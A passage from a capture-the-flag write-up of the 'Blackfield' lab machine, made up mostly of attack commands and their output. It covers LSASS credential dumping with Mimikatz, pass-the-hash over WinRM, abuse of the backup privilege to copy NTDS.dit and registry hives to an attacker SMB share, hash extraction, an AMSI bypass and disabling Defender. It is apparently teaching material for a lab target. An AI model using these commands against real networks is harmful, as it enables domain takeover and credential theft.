password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
[...]
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
DPAPI: 240339f898b6ac4ce3f34702e4a8955000000000
[...]
== DPAPI [25869]==
luid 153705
key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9
[...]
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
[...]
== DPAPI [633e3]==
luid 406499
key_guid 836e8326-d136-4b9f-94c7-3353c4e45770
masterkey 0ab34d5f8cb6ae5ec44a4cb49ff60c8afdf0b465deb9436eebc2fcb1999d5841496c3ffe892b0a6fed6742b1e13a5aab322b6ea50effab71514f3dbeac025bdf
sha1_masterkey 6efc8aa0abb1f2c19e101fbd9bebfb0979c4a991
[...]
- The Mimikatz’s minidump feature :
PS C:\Users\jamarir> mimikatz.exe "sekurlsa::minidump lsass.DMP" "sekurlsa::logonpasswords" "exit" |Select-String -NotMatch '^.*\(null\)|^\s*\w+\s+:\s*$'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # sekurlsa::minidump lsass.DMP
Switch to MINIDUMP : 'lsass.DMP'
mimikatz(commandline) # sekurlsa::logonpasswords
Opening : 'lsass.DMP' file for minidump...
Authentication Id : 0 ; 406458 (00000000:000633ba)
Session : Interactive from 2
User Name : svc_backup
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23/02/2020 19:00:03
SID : S-1-5-21-4194615774-2175524697-3563712290-1413
[00000003] Primary
* Username : svc_backup
* Domain : BLACKFIELD
* NTLM : 9658d1d1dcd9250115e2205d9f48400d
* SHA1 : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
* DPAPI : a03cd8e9d30171f3cfe8caad92fef621
* Username : svc_backup
* Domain : BLACKFIELD
* Username : svc_backup
* Domain : BLACKFIELD.LOCAL
Authentication Id : 0 ; 365835 (00000000:0005950b)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Time : 23/02/2020 18:59:38
SID : S-1-5-96-0-2
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
* Username : DC01$
* Domain : BLACKFIELD
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
[...]
Authentication Id : 0 ; 153705 (00000000:00025869)
Session : Interactive from 1
User Name : Administrator
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23/02/2020 18:59:04
SID : S-1-5-21-4194615774-2175524697-3563712290-500
[00000003] Primary
* Username : Administrator
* Domain : BLACKFIELD
* NTLM : 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
* SHA1 : db5c89a961644f0978b4b69a4d2a2239d7886368
* DPAPI : 240339f898b6ac4ce3f34702e4a89550
* Username : Administrator
* Domain : BLACKFIELD
* Username : Administrator
* Domain : BLACKFIELD.LOCAL
[...]
mimikatz(commandline) # exit
Bye!
For some reasons, I couldn’t read a process’s logon credentials I lauched in my VM, returning
ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations:PS C:\Users\jamarir> mimikatz.exe "sekurlsa::minidump $env:Temp\Notepad.DMP" "sekurlsa::logonpasswords" "exit" |Select-String -NotMatch '^(Logon Time)|^.*\(null\)|^\s*\w+\s+:\s*$' .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # sekurlsa::minidump C:\Users\jamarir\AppData\Local\Temp\Notepad.DMP Switch to MINIDUMP : 'C:\Users\jamarir\AppData\Local\Temp\Notepad.DMP' mimikatz(commandline) # sekurlsa::logonpasswords Opening : 'C:\Users\jamarir\AppData\Local\Temp\Notepad.DMP' file for minidump... ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations mimikatz(commandline) # exit Bye!
In particular, we see that the svc_backup’s NTHash is 9658d1d1dcd9250115e2205d9f48400d. Being a member of the Remote Management Users domain group, we may Pass-The-Hash over WinRM to impersonate svc_backup, and get the user flag !
jamarir@kali:~$ evil-winrm -i 10.10.10.192 -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type c:\users\svc_backup\desktop\user.txt
39[...]43
svc_backup, operate NTDS.dit plz !
Registry OverViewed
You may check Wikipedia, or the Microsoft’s documentation on Registry hives, or the Windows 2000 Registry Reference, for more details.
As the Microsoft documentation states, hives are key:value files stored in the registry, loaded into memory at boot or user logon. These hives locally configure Windows (environment variables, desktop/application preferences, network settings, etc.) at a :
User level (user profile hive, HKEY_CURRENT_USER). The currently logged configurations are stored in the
%USERPROFILE%\Ntuser.datfile.
Computer level (machine profile hive, HKEY_LOCAL_MACHINE). It mostly contain 4 hives (also called keys, or subkeys) in
%SYSTEMROOT%\System32\Config:HKLM\SAM: Stores the local SAM database, containing the local accounts’ information. In particular, it contains the non-builtin accounts’ NTHashes.
HKLM\SECURITY: Stores a dynamic link to the SAM database of the domain on which the user logged on, as well as the security policies to be enforced by the kernel.
HKLM\SYSTEM: Stores the Windows system setup, such as RNG data, mounted filesystems, Control Sets configuring hardware drivers / services.
HKLM\SOFTWARE: Stores program variables applying to all users.
Each hive can be parsed using the Registry Explorer, made by Eric Zimmerman (manual). Here are some samples from my VM:
What’s interesting to note is that both the NTDS, and the local SAM databases are encrypted with the Boot Key, in the SYSTEM registry hive. Then, with each file pair, we can extract domain or local credentials.
Secretsdumping Backed-up Dumps
svc_backup has the SeBackup privilege:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
As shown in BloodHound, this privilege is given to users in the Backup Operators group, a High Value target group:
Members of the Backup Operators group have SeBackupPrivilege, allowing them to backup any file, bypassing its permissions.
Thus, because we’re on a DC, we can backup the NTDS.dit database and its SYSTEM key. For local authentications on the DC, we’ll instead backup the SAM and SYSTEM hives.
These backups MUST be shadow-copied, as we can’t process currently-in-use files.
The Methodologies are the following:
reg.exe secrets extraction (SAM + SYSTEM)
Backup the
SAMandSYSTEMhives (e.g. inC:\Windows\Tasks\):*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\sam C:\windows\tasks\sam.hive The operation completed successfully. *Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system C:\windows\tasks\system.hive The operation completed successfully.Copy the interesting files in the attacker’s machine (10.10.14.20 here), and clean backups:
jamarir@kali:~$ smbserver.py share . -smb2support *Evil-WinRM* PS C:\Users\svc_backup\Documents> cp c:\windows\tasks\*.hive \\10.10.14.20\share\ *Evil-WinRM* PS C:\Users\svc_backup\Documents> rm c:\windows\tasks\*.hiveExtract NTHashes using
secretsdump.pyorpypykatz.jamarir@kali:~$ secretsdump.py -sam sam.hive -system system.hive LOCAL Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Cleaning up...jamarir@kali:~$ pypykatz registry --sam sam.hive system.hive [...] ============== SYSTEM hive secrets ============== CurrentControlSet: ControlSet001 Boot Key: 73d83e56de8961ca9f243e1a49638393 ============== SAM hive secrets ============== HBoot Key: 1d645695662cc2a70d54ee626104485110101010101010101010101010101010 Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Alternatively, offline dumping with Mimikatz is possible (requires admin to turn Defender off):
*Evil-WinRM* PS C:\Users\Administrator\Documents> Set-MpPreference -DisableRealtimeMonitoring $true *Evil-WinRM* PS C:\Users\svc_backup\Documents> ./mimikatz.exe "lsadump::sam /sam:C:\windows\tasks\sam.hive /system:C:\windows\tasks\system.hive" exit [...] SAMKey : 1d645695662cc2a70d54ee6261044851 RID : 000001f4 (500) User : Administrator Hash NTLM: 67ef902eae0d740df6257f273de75051 [...]
diskshadow.exe secrets extraction (NTDS + SYSTEM)
Shadow-Copy the
C:Drive into any drive (e.g.X:) (e.g. inC:\Windows\Tasks\):*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd c:/windows/tasks/ *Evil-WinRM* PS C:\windows\tasks> $alias="foo"; "set context persistent nowriters`r`nadd volume c: alias $alias`r`ncreate`r`nexpose %$alias% x:" |Out-File -Encoding ascii -nonewline "$alias.dsh" *Evil-WinRM* PS C:\windows\tasks> diskshadow.exe /s "$alias.dsh" Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: DC01, <DATE> -> set context persistent nowriters -> add volume c: alias foo -> create Alias foo for shadow ID {d933451e-36a6-4c58-8340-e80aeae781de} set as environment variable. Alias VSS_SHADOW_SET for shadow set ID {9b8032f4-cc5c-47d3-894b-c383e53f79a1} set as environment variable. Querying all shadow copies with the shadow copy set ID {9b8032f4-cc5c-47d3-894b-c383e53f79a1} * Shadow copy ID = {d933451e-36a6-4c58-8340-e80aeae781de} %foo% - Shadow copy set: {9b8032f4-cc5c-47d3-894b-c383e53f79a1} %VSS_SHADOW_SET% - Original count of shadow copies = 1 - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\] - Creation time: <DATE> - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4 - Originating machine: DC01.BLACKFIELD.local - Service machine: DC01.BLACKFIELD.local - Not exposed - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - Attributes: No_Auto_Release Persistent No_Writers Differential Number of shadow copies listed: 1 -> expose %foo% x: -> %foo% = {d933451e-36a6-4c58-8340-e80aeae781de} The shadow copy was successfully exposed as x:\.Copy our
X:Drive’sNTDSandSYSTEMfiles :*Evil-WinRM* PS C:\windows\tasks> robocopy /b x:\windows\ntds . ntds.dit *Evil-WinRM* PS C:\windows\tasks> robocopy /b x:\windows\system32\config . system ------------------------------------------------------------------------------- ROBOCOPY :: Robust File Copy for Windows ------------------------------------------------------------------------------- Started : <DATE> Source : x:\windows\system32\config\ Dest : C:\windows\tasks\ Files : system Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30 ------------------------------------------------------------------------------ 1 x:\windows\system32\config\ New File 17.0 m SYSTEM 0.0% 0.3% [...]Copy the interesting files in the attacker’s machine (10.10.14.20 here), and clean the shadow volume:
jamarir@kali:~$ smbserver.py share . -smb2support *Evil-WinRM* PS C:\windows\tasks> Copy-Item ntds.dit,SYSTEM -Destination \\10.10.14.20\share\ *Evil-WinRM* PS C:\windows\tasks> "delete shadows volume trophy`r`nreset" |Out-File -Encoding ascii -nonewline clean.dsh *Evil-WinRM* PS C:\windows\tasks> diskshadow.exe /s clean.dshExtract NTHashes using
secretsdump.py(add-historyoptions to get old users’ passwords).jamarir@kali:~$ secretsdump.py -ntds ntds.dit -system SYSTEM local -history Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c [*] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee::: Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:7f1e4ff8c6a8e6b6fcae2d9c0572cd62::: Administrator_history1:500:aad3b435b51404eeaad3b435b51404ee:ac2983b6afa7bdea9360fa7a95e31855::: Administrator_history2:500:aad3b435b51404eeaad3b435b51404ee:a47feb765cf90d3216423e9cfedea565::: Administrator_history3:500:aad3b435b51404eeaad3b435b51404ee:24958cffdd2aa3125c63c3fd374db44b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DC01$:1000:aad3b435b51404eeaad3b435b51404ee:5964cac13966b5f0ae5a519fc4646b0f::: DC01$_history0:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec::: [...] DC01$_history18:1000:aad3b435b51404eeaad3b435b51404ee:61aa6c112ae61a801f41d0751b50f681::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d::: krbtgt_history0:502:aad3b435b51404eeaad3b435b51404ee:ac4e588741c6d7d6505dab2ab46e1ca8::: [...] krbtgt_history8:502:aad3b435b51404eeaad3b435b51404ee:b5ca59b606a13445af2043409d2c0086::: audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa::: audit2020_history0:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5::: audit2020_history1:1103:aad3b435b51404eeaad3b435b51404ee:c63407eac237a49a7e559f453cc6a4df::: support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212::: support_history0:1104:aad3b435b51404eeaad3b435b51404ee:eca3e06b52f76be986e4cd4a01c0db69::: support_history1:1104:aad3b435b51404eeaad3b435b51404ee:7375cef738882d6c3a4592217951f491::: [...] svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d::: svc_backup_history0:1413:aad3b435b51404eeaad3b435b51404ee:c9dbdd98a153902cdb7a8b7c75f5d32e::: svc_backup_history1:1413:aad3b435b51404eeaad3b435b51404ee:cebb051cfe9bb3e92a6c92a1f63d4559::: svc_backup_history2:1413:aad3b435b51404eeaad3b435b51404ee:9d361a334c9fc1baa97b04a33ccad73c::: [...] [*] Kerberos keys from ntds.dit Administrator:aes256-cts-hmac-sha1-96:dbd84e6cf174af55675b4927ef9127a12aade143018c78fbbe568d394188f21f Administrator:aes128-cts-hmac-sha1-96:8148b9b39b270c22aaa74476c63ef223 Administrator:des-cbc-md5:5d25a84ac8c229c1 DC01$:aes256-cts-hmac-sha1-96:05fa169ef2fa63ce8fca5ad9b47602ce0ea5bcb2ad284e4b5b39510bf18d34c0 DC01$:aes128-cts-hmac-sha1-96:52a5c3142f1d92543f5e42cee189d721 DC01$:des-cbc-md5:0186100179b99143 krbtgt:aes256-cts-hmac-sha1-96:bd31681b175bd44ddf68c064445ca4e510ba2115e106905bdfef6ef0ff66b32c krbtgt:aes128-cts-hmac-sha1-96:676f63c263b8d482b271d091b2dde762 krbtgt:des-cbc-md5:fb4cb5761aef465d audit2020:aes256-cts-hmac-sha1-96:bdeca8eb67c5e70984efdfb33defdfc15644408fb06e948df7dba6d1760e0c0e audit2020:aes128-cts-hmac-sha1-96:5d1e1cb1fc6b59436fe9c9454c1d1608 audit2020:des-cbc-md5:c40701e67a10b673 support:aes256-cts-hmac-sha1-96:74574c46cab866ba40841f83b1226d429f6338fdf574f9a232ef551f9b7550c9 support:aes128-cts-hmac-sha1-96:19331e579612b1eb3356e8b5f0e2d890 support:des-cbc-md5:dfae341cef208f52 [...] svc_backup:aes256-cts-hmac-sha1-96:20a3e879a3a0ca4f51db1e63514a27ac18eef553d8f30c29805c398c97599e91 svc_backup:aes128-cts-hmac-sha1-96:139276fff0dcec3c349cb8b563691d06 svc_backup:des-cbc-md5:981a38735d7c32d6 [...] SRV-INTRANET$:des-cbc-md5:4579ce9240895dae [*] Cleaning up...
Pass-The-Hash th4t 4dm1n !
The Administrator’s NTHash in NTDS is 184fb5e5178480be64824d4cd53b99ee.
GG WP !
jamarir@kali:~$ evil-winrm -i 10.10.10.192 -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee'
*Evil-WinRM* PS C:\Users\Administrator\Documents> get-content ../desktop/root.txt
43[...]cb
Seeing the
Remote Management Users's members from BloodHound, or from the following LDAP query, doesn’t show the Administrator account within that group:jamarir@kali:~$ nxc ldap 10.10.10.192 -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d' -d 'BLACKFIELD.local' --query "(&(memberOf=CN=Remote Management Users,CN=Builtin,DC=BLACKFIELD,DC=LOCAL))" "distinguishedName" [...] LDAP 10.10.10.192 389 DC01 distinguishedName: CN=svc_backup,CN=Users,DC=BLACKFIELD,DC=localActually, the Microsoft’s “Configure remote Manamgement in Server Manager” article states that local administrators may not have access to WinRM. However, this is NOT applicable for the builtin Administrator, who can always access WinRM.
ntdsutil.exe / DSInternals extraction method (NTDS + SYSTEM) (requires admin !)
Another method to extract the NTDS’s secrets is to use the Get-ADDBAccount.ps1 script, from the DSInternals suite. This method requires a media, called the IFM (Installation Full Media). This media is used, for example, to copy the NTDS database over the network to newly installed DCs, even if the NTDS is currently in use.
The procedure is :
Just in case an AMSI memory malware scanner is enabled in the WinRM process, bypass it :
*Evil-WinRM* PS C:\Users\Administrator\Documents> Bypass-4MSIUpload the DSInternals archive in the target and unzip it:
jamarir@kali:~$ ls DSInternals_v4.14.zip jamarir@kali:~$ smbserver.py share . -smb2support *Evil-WinRM* PS C:\Users\Administrator\Documents> cp \\10.10.14.20\share\DSInternals_v4.14.zip . *Evil-WinRM* PS C:\Users\Administrator\Documents> Expand-Archive DSInternals_v4.14.zip DSInternalsImport the DSInternals PowerShell modules :
*Evil-WinRM* PS C:\Users\Administrator\Documents> Import-Module ./DSInternals/DSInternals/DSInternals.psd1 -Force *Evil-WinRM* PS C:\Users\Administrator\Documents> gcm Get-ADDB* CommandType Name Version Source ----------- ---- ------- ------ Alias Get-ADDBGroupManagedServiceAccount 4.14 DSInternals Cmdlet Get-ADDBAccount 4.14 DSInternals Cmdlet Get-ADDBBackupKey 4.14 DSInternals Cmdlet Get-ADDBDomainController 4.14 DSInternals Cmdlet Get-ADDBKdsRootKey 4.14 DSInternals Cmdlet Get-ADDBSchemaAttribute 4.14 DSInternals Cmdlet Get-ADDBServiceAccount 4.14 DSInternalsShadow-copy the
NTDSandSYSTEMfiles usingntdsutil.exe:*Evil-WinRM* PS C:\Users\Administrator\Documents> ntdsutil.exe "activate instance ntds" "ifm" "create SYSVOL full C:\Windows\Tasks\NTDS" quit quit C:\Windows\system32\ntdsutil.exe: activate instance ntds Active instance set to "ntds". C:\Windows\system32\ntdsutil.exe: ifm ifm: create SYSVOL full C:\Windows\Tasks\NTDS Creating snapshot... Snapshot set {de4afe4e-89b6-44aa-a99a-b0bd4fa81dfe} generated successfully. Snapshot {e337fe93-ef60-4e75-b65b-869cee06de0b} mounted as C:\$SNAP_<DATE>_VOLUMEC$\ Snapshot {e337fe93-ef60-4e75-b65b-869cee06de0b} is already mounted. Snapshot {e337fe93-ef60-4e75-b65b-869cee06de0b} is already mounted. Initiating DEFRAGMENTATION mode... Source Database: C:\$SNAP_<DATE>_VOLUMEC$\Windows\NTDS\ntds.dit Target Database: C:\Windows\Tasks\NTDS\Active Directory\ntds.dit Defragmentation Status (omplete) 0 10 20 30 40 50 60 70 80 90 100 |----|----|----|----|----|----|----|----|----|----| ................................................... Copying registry files... Copying C:\Windows\Tasks\NTDS\registry\SYSTEM Copying C:\Windows\Tasks\NTDS\registry\SECURITY Copying SYSVOL... [...] Snapshot {e337fe93-ef60-4e75-b65b-869cee06de0b} unmounted. IFM media created successfully in C:\Windows\Tasks\NTDS ifm: quit C:\Windows\system32\ntdsutil.exe: quitExtract NTHashes using the
Get-ADDBAccountscript.*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADDBAccount -All -DBPath 'C:\Windows\Tasks\NTDS\Active Directory\ntds.dit' -BootKey (Get-BootKey -SystemHivePath 'C:\Windows\Tasks\NTDS\registry\SYSTEM') [Very long output crashing WinRM !] *Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADDBAccount -DistinguishedName 'CN=Administrator,CN=Users,DC=BLACKFIELD,DC=local' -DBPath 'C:\Windows\Tasks\NTDS\Active Directory\ntds.dit' -BootKey (Get-BootKey -SystemHivePath 'C:\Windows\Tasks\NTDS\registry\SYSTEM') DistinguishedName: CN=Administrator,CN=Users,DC=BLACKFIELD,DC=local Sid: S-1-5-21-4194615774-2175524697-3563712290-500 Guid: 2118ae1a-b338-4308-9901-bb763a7c0e5b SamAccountName: Administrator SamAccountType: User UserPrincipalName: PrimaryGroupId: 513 SidHistory: Enabled: True UserAccountControl: NormalAccount, PasswordNeverExpires SupportedEncryptionTypes: Default AdminCount: True Deleted: False LastLogonDate: <DATE> DisplayName: GivenName: Surname: Description: Built-in account for administering the computer/domain ServicePrincipalName: SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited, DiscretionaryAclProtected, SelfRelative Owner: S-1-5-21-4194615774-2175524697-3563712290-512 Secrets NTHash: 184fb5e5178480be64824d4cd53b99ee LMHash: NTHashHistory: Hash 01: 184fb5e5178480be64824d4cd53b99ee Hash 02: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 Hash 03: ac2983b6afa7bdea9360fa7a95e31855 Hash 04: a47feb765cf90d3216423e9cfedea565 Hash 05: 24958cffdd2aa3125c63c3fd374db44b LMHashHistory: Hash 01: 9f5d55ddfdef1ad96c83f770bed89df3 Hash 02: b795d74a5f0181fd412a76c1600c8bfb Hash 03: 885326d4dee15df39276657a555fb362 Hash 04: 226816c11a2502b73182332a62ff325f SupplementalCredentials: ClearText: NTLMStrongHash: d3880175259bd17683f008ffe8312511 [...]
PsExec isn’t possible ? :(
NTDS vs Defender
Here’s a recap of the Administrator’s NTHash we dumped from the NTDS:
*Evil-WinRM* PS C:\windows\tasks> $alias="foo"; "set context persistent nowriters`r`nadd volume c: alias $alias`r`ncreate`r`nexpose %$alias% x:" |Out-File -Encoding ascii -nonewline "$alias.dsh"
*Evil-WinRM* PS C:\windows\tasks> diskshadow.exe /s "$alias.dsh"
*Evil-WinRM* PS C:\windows\tasks> robocopy /b x:\windows\ntds . ntds.dit
*Evil-WinRM* PS C:\windows\tasks> robocopy /b x:\windows\system32\config . system
jamarir@kali:~$ secretsdump.py -ntds ntds.dit -system SYSTEM local
[...]
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
*Evil-WinRM* PS C:\Users\Administrator\Documents> Import-Module ./DSInternals/DSInternals/DSInternals.psd1 -Force
*Evil-WinRM* PS C:\Users\Administrator\Documents> ntdsutil.exe "activate instance ntds" "ifm" "create SYSVOL full C:\Windows\Tasks\NTDS" quit quit
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADDBAccount -DistinguishedName 'CN=Administrator,CN=Users,DC=BLACKFIELD,DC=local' -DBPath 'C:\Windows\Tasks\NTDS\Active Directory\ntds.dit' -BootKey (Get-BootKey -SystemHivePath 'C:\Windows\Tasks\NTDS\registry\SYSTEM')
[...]
Secrets
NTHash: 184fb5e5178480be64824d4cd53b99ee
LMHash:
NTHashHistory:
Hash 01: 184fb5e5178480be64824d4cd53b99ee
Hash 02: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
[...]
LMHashHistory:
Hash 01: 9f5d55ddfdef1ad96c83f770bed89df3
Hash 02: b795d74a5f0181fd412a76c1600c8bfb
[...]
Even if we have access to the ADMIN$ share:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\Administrator:184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ READ,WRITE Remote Admin
SMB 10.10.10.192 445 DC01 C$ READ,WRITE Default share
[...]
We can’t PsExec using that valid Administrator’s NTHash. Setting the debug option shows:
jamarir@kali:~$ psexec.py -hashes ':184fb5e5178480be64824d4cd53b99ee' 'BLACKFIELD.LOCAL/Administrator@10.10.10.192' -debug
Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /home/jamarir/.venv/lib/python3.12/site-packages/impacket
[+] StringBinding ncacn_np:10.10.10.192[\pipe\svcctl]
[*] Requesting shares on 10.10.10.192.....
[*] Found writable share ADMIN$
[*] Uploading file UKuogZlp.exe
[*] Opening SVCManager on 10.10.10.192.....
[*] Creating service yXDy on 10.10.10.192.....
[*] Starting service yXDy.....
[Execution flow blocked for some time...]
Traceback (most recent call last):
File "/home/jamarir/.venv/bin/psexec.py", line 165, in doStuff
fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/jamarir/.venv/bin/psexec.py", line 115, in openPipe
raise Exception('Pipe not ready, aborting')
Exception: Pipe not ready, aborting
[+] Pipe not ready, aborting
[*] Opening SVCManager on 10.10.10.192.....
[-] Error performing the uninstallation, cleaning up
Indeed, when looking at the content of ADMIN$ share (C:\Windows\) before, during, and after PsExec, we see that an uploaded file is deleted:
*Evil-WinRM* PS C:\windows\tasks> Get-ChildItem |Sort-Object -Property LastWriteTime
[...]
-a---- <DATE> 9:05 PM 52790 admin$_pre_psexec.txt
-a---- <DATE> 9:06 PM 53292 admin$_while1_psexec.txt
-a---- <DATE> 9:06 PM 52790 admin$_while2_psexec.txt
-a---- <DATE> 9:07 PM 52790 admin$_post_psexec.txt
The ADMIN$'s size dropping from 53292 to 52790 is noted some seconds after the [*] Starting service yXDy..... message. Comparing the two objects shows that’s actually the UKuogZlp.exe file that is deleted after the upload:
*Evil-WinRM* PS C:\windows\tasks> Compare-Object (Get-Content 'admin$_while1_psexec.txt') (Get-Content 'admin$_while2_psexec.txt')
[...]
-a---- <DATE> 9:05 PM 56320 UKuogZlp.exe
To check further, I enabled the SMB features in my Windows 11 VM (you can disabled momentarily Windows Defender), and PsExec’ed on my VM:
PS C:\Users\jamarir> mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
jamarir@kali:~$ psexec.py -hashes ':<NTHash>' './jamarir@192.168.56.4' -remote-binary-name BLACKFIELD.exe
Once the PsExec binary is uploaded, a Defender’s notification popped up:
Bypassing the antivirus is out of scope for this CTF, but at least the PsExec failure is understandable, and possible when Defender’s disabled :)
*Evil-WinRM* PS C:\Users\Administrator\Documents> Set-MpPreference -DisableRealtimeMonitoring $true
jamarir@kali:~$ psexec.py -hashes ':184fb5e5178480be64824d4cd53b99ee' 'BLACKFIELD.LOCAL/Administrator@10.10.10.192'
Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.10.192.....
[*] Found writable share ADMIN$
[*] Uploading file fMoiOKYo.exe
